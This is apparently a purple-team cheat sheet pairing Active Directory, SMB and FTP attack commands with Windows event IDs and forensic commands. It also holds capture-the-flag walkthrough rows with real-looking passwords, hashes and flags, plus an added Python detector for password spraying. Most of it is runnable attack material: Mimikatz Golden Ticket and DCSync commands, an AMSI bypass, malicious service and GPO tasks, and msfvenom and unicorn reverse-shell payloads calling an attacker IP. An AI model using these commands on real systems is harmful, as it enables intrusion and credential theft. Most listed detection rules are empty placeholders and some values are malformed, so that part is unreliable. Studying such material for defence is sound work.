Purple Teaming
Last updated
Discord: https://discord.gg/CqV6aJXMkA
Telegram: https://t.me/Hadess_security
Attack Type | Command | Description |
---|---|---|
Enumerating Shares | `smbclient -L \\\\TARGET_IP` | Lists SMB shares on the target. |
Null Session | `rpcclient -U "" -N TARGET_IP` | Connects to the target with a null session. |
Brute Force | `crackmapexec smb TARGET_IP -u users.txt -p passwords.txt` | Brute-forces SMB credentials. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4648 | A logon was attempted using explicit credentials. | `SecurityEvent` |
5145 | A network share object was checked to see whether the client can be granted the desired access. | `SecurityEvent` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01` | Extracts a timeline from a forensic image into a plaso storage file. |
`psort.py -z UTC -o l2tcsv -w timeline.csv timeline.plaso` | Sorts the events in the plaso file and outputs them to CSV. |
`fls -r -m "/" image.E01 > bodyfile` | Generates a body file from an image. |

Attack Type | Command | Description |
---|---|---|
Anonymous Login | `ftp TARGET_IP`, then enter `anonymous` as the user | Attempts an anonymous login to the FTP server. |
Brute Force | `hydra -l user -P passlist.txt ftp://TARGET_IP` | Brute-forces FTP credentials. |
File Upload | `ftp TARGET_IP`, then use `put filename` | Uploads a file to the FTP server. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4625 | An account failed to log on. | `SecurityEvent` |
4648 | A logon was attempted using explicit credentials. | `SecurityEvent` |
5156 | The Windows Filtering Platform has permitted a connection. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 21 -w ftp_traffic.pcap` | Captures FTP traffic on port 21. |
`tshark -r ftp_traffic.pcap -Y ftp.request -T fields -e frame.time -e ip.src -e ftp.request.command -e ftp.request.arg` | Extracts the FTP commands from the capture with tshark for timeline analysis. |
`strings -a forensic_image.raw \| grep -i 'ftp'` | Searches for FTP-related strings in a forensic image. |

Attack Technique | Command | Description |
---|---|---|
LLMNR Poisoning | `Responder -I eth0 -wrf` | Uses Responder to poison LLMNR requests. |
AS-REP Roasting | `GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep_hashes` | Extracts AS-REP hashes for users without pre-authentication. |
ForceChangePassword | `Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)` | Forces a password change for a domain user. |
GenericWrite | `Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All` | Modifies permissions for a domain object. |
Password Spraying | `crackmapexec smb DOMAIN -u users.txt -p 'Password123' --continue-on-success` | Attempts to log in with a common password. |
RunForrestRun.exe | `.\RunForrestRun.exe -Domain DOMAIN -User user -Password 'Password123'` | Executes RunForrestRun for lateral movement. |
Abusing Vulnerable GPO | `New-GPOImmediateTask -TaskName "MaliciousTask" -Command "cmd.exe" -CommandArguments "/c evil_script.bat"` | Creates a GPO immediate task that runs a malicious command. |
Abusing MSSQL Service | `Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "net localgroup Administrators /add DOMAIN\user"` | Executes a command via SQL Server. |
Abusing Domain Trusts | `Get-DomainTrustMapping -API` | Enumerates and abuses domain trusts. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4742 | A computer account was changed. | `SecurityEvent` |
4624 | An account was successfully logged on. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 445 or port 139 -w smb_traffic.pcap` | Captures SMB traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

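The SMB and FTP brute-force rows and the password-spraying row above all reach the Security log as bursts of event 4625 (or 4771 where Kerberos pre-authentication fails), and the two patterns are told apart by how the failures are distributed, not by their count alone. The following is an added example, not part of the original cheat sheet, that applies that distinction to 4625 records: brute force concentrates many failures on one account from one source, spraying spreads one attempt each across many accounts from one source. The field names (`TargetUserName`, `IpAddress`, `Status`) are those of the 4625 event; the window, the thresholds, and the sample events are constructed assumptions.

```python
"""Classify bursts of Windows Security event 4625 (logon failure) as
brute force or password spraying.  Added example, not part of the
original cheat sheet; the sample events below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)    # sliding window per source (assumption)
BRUTE_FORCE_THRESHOLD = 10       # failures against one account from one source
SPRAY_THRESHOLD = 10             # distinct accounts failed from one source


def _ts(s):
    return datetime.fromisoformat(s)


def build_sample_events():
    """Constructed 4625 records: one brute-forcing source, one spraying
    source, and a single benign typo from a third host."""
    base = _ts("2024-03-01T09:00:00")
    events = []
    # 10.0.0.50 hammers a single account (wrong password, status 0xC000006D)
    for i in range(15):
        events.append({"ts": base + timedelta(seconds=5 * i), "EventID": 4625,
                       "TargetUserName": "svc_backup", "IpAddress": "10.0.0.50",
                       "Status": "0xC000006D"})
    # 10.0.0.77 tries one password against twenty different accounts
    for i in range(20):
        events.append({"ts": base + timedelta(seconds=7 * i), "EventID": 4625,
                       "TargetUserName": f"user{i:02d}", "IpAddress": "10.0.0.77",
                       "Status": "0xC000006D"})
    # a lone failure from a workstation: normal noise
    events.append({"ts": base, "EventID": 4625, "TargetUserName": "alice",
                   "IpAddress": "10.0.0.12", "Status": "0xC000006A"})
    return events


def detect_logon_attacks(events, window=WINDOW):
    """Return {source_ip: [verdicts]} where verdicts are 'brute_force'
    and/or 'password_spray', evaluated over a sliding window per source."""
    by_src = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4625:
            by_src[e["IpAddress"]].append(e)

    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # advance the window start so the span never exceeds `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            per_account = defaultdict(int)
            for e in evs[start:end + 1]:
                per_account[e["TargetUserName"]] += 1
            verdicts = set()
            if max(per_account.values()) >= BRUTE_FORCE_THRESHOLD:
                verdicts.add("brute_force")      # one account, many failures
            if len(per_account) >= SPRAY_THRESHOLD:
                verdicts.add("password_spray")   # many accounts, few failures each
            if verdicts:
                findings[src] = findings.get(src, set()) | verdicts
    return {src: sorted(v) for src, v in findings.items()}


if __name__ == "__main__":
    for src, verdicts in detect_logon_attacks(build_sample_events()).items():
        print(f"{src}: {', '.join(verdicts)}")
```

In a Kerberos-only environment the same failures appear as 4771 on the domain controllers instead of 4625 on the member server; the grouping logic is identical, only the event ID and the client address field (`IpAddress` in both) change. The thresholds are deliberately conservative; tune them against a baseline of your own logon-failure volume before alerting.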
Attack Technique | Command | Description |
---|---|---|
Service Permission | `sc.exe sdset SERVICE_NAME DACL_string` | Modifies service permissions. |
ForceChangePassword | `Set-DomainUserPassword -Identity user -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)` | Forces a password change for a domain user. |
Abuse ACLs | `Add-DomainObjectAcl -TargetIdentity "DOMAIN\Group" -PrincipalIdentity "Attacker" -Rights All` | Modifies ACLs for domain objects. |
Abuse SQL Instance | `Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"` | Executes commands via a SQL Server instance. |
Abuse Service | `sc.exe create evilservice binPath= "cmd.exe /c evil_script.bat"` | Creates a malicious service. |
Pass the Ticket | `mimikatz.exe "kerberos::ptt ticket.kirbi"` | Uses stolen Kerberos tickets for authentication. |
Golden Ticket | `mimikatz.exe "kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_HASH /id:500"` | Creates a Golden Ticket for domain persistence. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
4728 | A member was added to a security-enabled global group. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |
4769 | Kerberos Service Ticket (TGS) was requested. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Attack Technique | Command | Description |
---|---|---|
Always Elevated | `Set-ADObject -Identity user -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'='SDDL_string'}` | Modifies an AD object to grant elevated privileges. |
Constrained Delegation | `Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker` | Sets constrained delegation on a target computer. |
Unconstrained Delegation Print Bug | `Rubeus.exe monitor /interval:30 /nowrap` | Monitors for TGTs if unconstrained delegation is enabled. |
Cross Trust | `Get-DomainTrust -Domain target_domain` | Enumerates trust relationships between domains. |
Abuse MSSQL Service | `Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"` | Executes commands via a SQL Server instance. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |
4769 | Kerberos Service Ticket (TGS) was requested. | `SecurityEvent` |
4624 | An account was successfully logged on. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Attack Technique | Command | Description |
---|---|---|
Bypass AMSI | `GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)` | Disables AMSI in a PowerShell session. |
Always Elevated | `Set-ADObject -Identity user -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'='SDDL_string'}` | Modifies an AD object to grant elevated privileges. |
Constrained Delegation | `Set-ADComputer -Identity target -PrincipalsAllowedToDelegateToAccount attacker` | Sets constrained delegation on a target computer. |
Pass the Ticket | `mimikatz.exe "kerberos::ptt ticket.kirbi"` | Uses stolen Kerberos tickets for authentication. |
Abuse SQL Instance | `Invoke-SQLOSCmd -Instance "MSSQLSERVER" -Command "malicious_command"` | Executes commands via a SQL Server instance. |
Abuse GPO | `New-GPOImmediateTask -TaskName "MaliciousTask" -Command "cmd.exe" -CommandArguments "/c evil_script.bat"` | Creates a GPO immediate task that runs a malicious command. |
DCSync Attack | `mimikatz.exe "lsadump::dcsync /user:domain\krbtgt"` | Extracts credentials from AD using DCSync. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4104 | PowerShell script block logging. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Attack Technique | Command | Description |
---|---|---|
Nmap Scanning | `nmap -sC -sV -oA nmap/result 10.10.10.210` | Scans the target for open ports and services. |
Gobuster Directory Scanning | `gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50` | Enumerates directories on the web server. |
Gathering Usernames | Gather usernames manually and create a `user.txt` file | Collects usernames for further attacks. |
Password Spraying | `python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01` | Attempts to log in with common passwords. |
Sending Phishing Emails | Use Outlook to send phishing emails and capture the NTLMv2 hash with Responder | Executes a phishing campaign. |
Cracking NTLMv2 Hash | `hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force` | Cracks captured NTLMv2 hashes. |
PowerShell Remote Session | `$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson` | Establishes a remote PowerShell session. |
Creating a Symlink | `New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'` | Creates a junction (symbolic link) to escalate privileges. |
Using Check-File Command | `Check-File C:\programdata\root\Desktop\root.txt` | Checks for the presence of a specific file. |
Transferring Files with nc.exe | `iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'` | Transfers files using nc.exe. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |
4720 | A user account was created. | `SecurityEvent` |
1102 | The audit log was cleared. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 80 -w http_traffic.pcap` | Captures HTTP traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Attack Technique | Command | Description |
---|---|---|
Nmap Scanning | `nmap -sC -sV -oA nmap/result 10.10.10.211` | Scans the target for open ports and services. |
Web Enumeration with Wappalyzer | Use Wappalyzer to identify backend technologies | Identifies technologies used on the web server. |
Analyzing .git Directory | Check the `Gemfile` in the git directory for Ruby and Gem versions | Analyzes the .git directory for sensitive information. |
Exploiting Ruby on Rails | Use a Ruby on Rails exploit | Exploits vulnerabilities in Ruby on Rails. |
Capturing Request in Burp | Capture the request and modify it with the exploit | Captures and modifies HTTP requests for exploitation. |
Getting a Reverse Shell | Use a netcat listener and send the exploit to get a reverse shell | Gains shell access on the target system. |
Cracking Password Hashes | Use John the Ripper to crack the password hashes found in `/var/backups` | Cracks password hashes to gain credentials. |
Bypassing Two-Factor Authentication | Use the contents of `.google_authenticator` to bypass two-factor authentication | Bypasses 2FA using the .google_authenticator file. |
Synchronizing Time for Exploit | Adjust the system time to match the timezone for the exploit to work | Synchronizes system time for time-based exploits. |
Gaining Root Access with GTFOBins | `sudo gem open -e "/bin/sh -c /bin/sh" rdoc` | Uses GTFOBins for privilege escalation to root. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |
4720 | A user account was created. | `SecurityEvent` |
1102 | The audit log was cleared. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 80 -w http_traffic.pcap` | Captures HTTP traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Stage | Technique | Command | Description |
---|---|---|---|
Recon | Nmap Scanning | `nmap -sV -sC -oN nmap 10.10.10.237` | Scans the target for open ports and services. |
Recon | File Analysis | `file headv1\\Setup\\1.0.0.exe` | Analyzes the executable file for type and content. |
Recon | SMB Enumeration | `smbclient -L \\\\10.10.10.237` | Enumerates SMB shares on the target. |
Recon | SMB File Transfer | `smbclient \\\\10.10.10.237\\Software_Updates`, then `get UAT_Testing_Procedures.pdf` | Transfers files via SMB. |
Exploitation | Crafting Malicious Binary | `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "rspoof.exe"` | Creates a reverse shell executable. |
Exploitation | YML File Creation | Manual creation of a `latest.yml` file | Creates a .yml file for the exploit. |
Exploitation | SMB File Transfer | `smbclient \\\\10.10.10.237\\Software_Updates`, then `put latest.yml` | Uploads the .yml file via SMB. |
Exploitation | Reverse Shell | Use Metasploit to listen for the reverse shell | Listens for an incoming reverse shell connection. |
Exploitation | Redis Exploitation | `redis-cli -h 10.10.10.237`, then `get pk:urn:user:e8e29158-d70d-44b1-alba-4949d52790a0` | Exploits Redis to retrieve data. |
Exploitation | Password Decryption | `python3 decrypt.py` with the script provided in the summary | Decrypts a password using a provided script. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |
1102 | The audit log was cleared. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 445 -w smb_traffic.pcap` | Captures SMB traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Stage | Technique | Command | Description |
---|---|---|---|
Credential Dumping | Enumerating Credentials | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force` | Enumerates stored credentials on WS02. |
Credential Dumping | Using Mimikatz | Upload `mimikatz.exe` and execute `sekurlsa::dpapi` to get the master key | Dumps credentials using Mimikatz. |
Credential Decryption | Decrypting Credentials | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84` | Decrypts the stored credential with the recovered master key. |
Port Forwarding | Setting up Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389` | Sets up port forwarding. |
RDP Connection | Connecting via RDP with Remmina | Install Remmina, import `sql01.rdp`, change the host, export to an .rdp file | Connects via RDP using Remmina. |
RDP Connection | Using FreeRDP | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local` | Connects via RDP using FreeRDP. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent \| where EventID == 4624` |
4688 | A new process has been created. | `SecurityEvent \| where EventID == 4688` |
5145 | A network share object was checked. | `SecurityEvent \| where EventID == 5145` |
4672 | Special privileges assigned to new logon. | `SecurityEvent \| where EventID == 4672` |
3389 | RDP connection attempt. | `NetworkTraffic \| where DestinationPort == 3389` |

Command | Description |
---|---|
`tcpdump -i eth0 port 3389 -w rdp_traffic.pcap` | Captures RDP traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Stage | Technique | Command | Description |
---|---|---|---|
Credential Enumeration | Finding LAPS Group Members | Enumeration shows that `ngodfrey_adm` is a member of the LAPS group on WS05 | Identifies LAPS group members. |
Credential Access | Dumping Credentials with PowerSploit | `powershell -ep bypass`, then `Import-Module .\PowerSploit.psd1` | Dumps credentials using PowerSploit. |
Credential Access | Using Credentials for Access | `$SecPassword = ConvertTo-SecureString "J5KCwKruINyCJBKd1dZU" -AsPlainText -Force`, then `$cred = New-Object System.Management.Automation.PSCredential ('rastalabs.local\ngodfrey_adm', $SecPassword)` | Uses the dumped credentials for access. |
Credential Access | Getting AD Object with Credentials | `Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred` | Retrieves AD objects using the credentials. |
Local Admin Passwords | Retrieving Local Admin Passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 | Retrieves local admin passwords. |
Port Forwarding | Setting up Port Forwarding with Meterpreter | `portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445`, and similarly for other ports | Sets up port forwarding using Meterpreter. |
Exploitation | Using MS17-010 Exploit | `exploit/windows/smb/ms17_010_psexec` with LPORT 80, 443, 8080 | Exploits MS17-010 for an admin shell. |
Flag Retrieval | Retrieving Flags | Flags are `RASTA{3v3rybOdy_10v35_14p5}`, `RASTA-wh3¼3_w45_2£4_!?3`, `RASTA-50m371m35.yOu_mu57_b4ck714ck}` | Retrieves flags from WS02 and WS04. |
Post-Exploitation | Running Mimikatz | `privilege::debug`, then `sekurlsa::logonPasswords` | Runs Mimikatz on WS02 to dump credentials. |

Event Code | Description | KQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
7045 | A new service was installed. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 445 -w smb_traffic.pcap` | Captures SMB traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Stage | Technique | Command | Description |
---|---|---|---|
Phishing | Creating Phishing HTA | `python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta` | Generates a phishing HTA file. |
Web Server Setup | Hosting HTA on Apache2 | `cp index.html launcher.hta /var/www/html; service apache2 start` | Hosts the HTA file on an Apache2 server. |
Listener Setup | Setting up Metasploit Listener | `msfconsole -r unicorn.rc` | Sets up a listener in Metasploit. |
Share Enumeration | Viewing Shares on Network | `net share` | Enumerates shared resources on the network. |
User Enumeration | Displaying Domain User Accounts | `net user /domain` | Lists user accounts on the domain. |
User Information | Viewing User Info | `net user [username] /domain` | Displays information about a specific domain user. |
Group Enumeration | Viewing Domain Group Members | `net group finance /domain` | Lists members of a specific domain group. |
Drive Enumeration | Listing Logical Drives | `fsutil fsinfo drives`, `wmic logicaldisk get name`, or `diskpart` followed by `list volume` | Enumerates logical drives on the system. |
Network Recon | Pinging Servers for IP Addresses | `ping DC01; ping FS01; ...; ping WS05` | Pings servers to discover IP addresses. |
Flag Retrieval | Accessing the Flag | Flag is XYZ, located in `M:\Documents` | Retrieves a flag from a specified location. |
KeePass Database | Found KeePass Database and Key File | Located the KeePass database and key file | Identifies the KeePass database and key file. |

Event Code | Description | KQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |
1102 | The audit log was cleared. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 80 -w http_traffic.pcap` | Captures HTTP traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Stage | Technique | Command | Description |
---|---|---|---|
Credential Use | Using epugh_adm Credentials | Log in to web01 (10.10.110.10), then RDP to sql01 (10.10.122.15) using the epugh_adm credentials | Uses credentials to access multiple systems. |
Lateral Movement | RDP with gopikrishna | RDP to fs01 as user gopikrishna (local admin) | Uses RDP for lateral movement. |
Malware Execution | Running p0wnedShell.exe | Run `p0wnedShell.exe` from an admin cmd | Executes malware with administrative privileges. |
Credential Dumping | Invoke Mimikatz from p0wnedShell | Use option 4 in p0wnedShell to invoke Mimikatz and get the rweston_da NTLM hash | Dumps credentials using Mimikatz. |
Credential Use | Pass-the-Hash with Mimikatz | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa` | Uses the pass-the-hash technique for authentication. |
Golden Ticket Attack | Perform DCSync | Use option 10 in p0wnedShell to perform DCSync | Extracts the krbtgt hash for Golden Ticket creation. |
Golden Ticket Attack | Generate Golden Ticket | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a235717938a8bbcebib /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` | Creates a Golden Ticket for domain access. |
Golden Ticket Attack | Use Golden Ticket | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` | Uses the Golden Ticket for authentication. |

Event Code | Description | KQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4688 | A new process has been created. | `SecurityEvent` |
5145 | A network share object was checked. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 3389 -w rdp_traffic.pcap` | Captures RDP traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Technique | Command | Description |
---|---|---|
Golden Ticket Attack | `mimikatz.exe "kerberos::golden /user:Administrator /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /krbtgt:XXXXXX /id:500 /ptt"` | Generates a Golden Ticket using Mimikatz. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4768 | Kerberos TGT requested. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4624 | Successful account logon. | `SecurityEvent` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |

Technique | Command | Description |
---|---|---|
Silver Ticket Attack | `mimikatz.exe "kerberos::golden /user:User /domain:yourdomain.com /sid:S-1-5-21-XXXXXX-XXXXXX-XXXXXX /target:service.yourdomain.com /service:ServiceType /rc4:XXXXXX /ptt"` | Generates a Silver Ticket for a specific service using Mimikatz. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4769 | Kerberos Service Ticket (TGS) was requested. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4624 | Successful account logon. | `SecurityEvent` |

Command | Description |
---|---|
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |

Technique | Command | Description |
---|---|---|
Kerberoasting | `GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>` | Uses GetUserSPNs.py to request service tickets for service accounts. |
Kerberoasting | `mimikatz.exe "kerberos::list /export"` | Uses Mimikatz to list and export service tickets. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4769 | Kerberos Service Ticket (TGS) was requested. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Technique | Command | Description |
---|---|---|
Pass the Ticket | `mimikatz.exe "kerberos::ptt <ticket.kirbi>"` | Uses Mimikatz to pass a Kerberos ticket for authentication. |
Pass the Ticket | `Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'` | Uses PowerShell and Mimikatz to pass a Kerberos ticket. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4624 | An account was successfully logged on. | `SecurityEvent` |
4672 | Special privileges assigned to new logon. | `SecurityEvent` |
4768 | Kerberos Authentication Ticket (TGT) was requested. | `SecurityEvent` |

Command | Description |
---|---|
`tcpdump -i eth0 port 88 -w kerberos_traffic.pcap` | Captures Kerberos traffic for analysis. |
`volatility -f memory_dump.raw --profile=Win10x64_18362 netscan` | Scans for network artifacts in a memory dump. |
`log2timeline.py -z UTC --storage-file timeline.plaso image.E01 && psort.py -o l2tcsv -w timeline.csv timeline.plaso` | Extracts a timeline from a forensic image into a plaso file and writes it out as CSV. |

Technique | Command | Description |
---|---|---|
DCSync | `mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:yourdomain.com"` | Uses Mimikatz to simulate the replication behavior of a Domain Controller and request account password data. |

Event Code | Description | KQL/EQL Rule |
---|---|---|
4662 | An operation was performed on an object. | `SecurityEvent` |
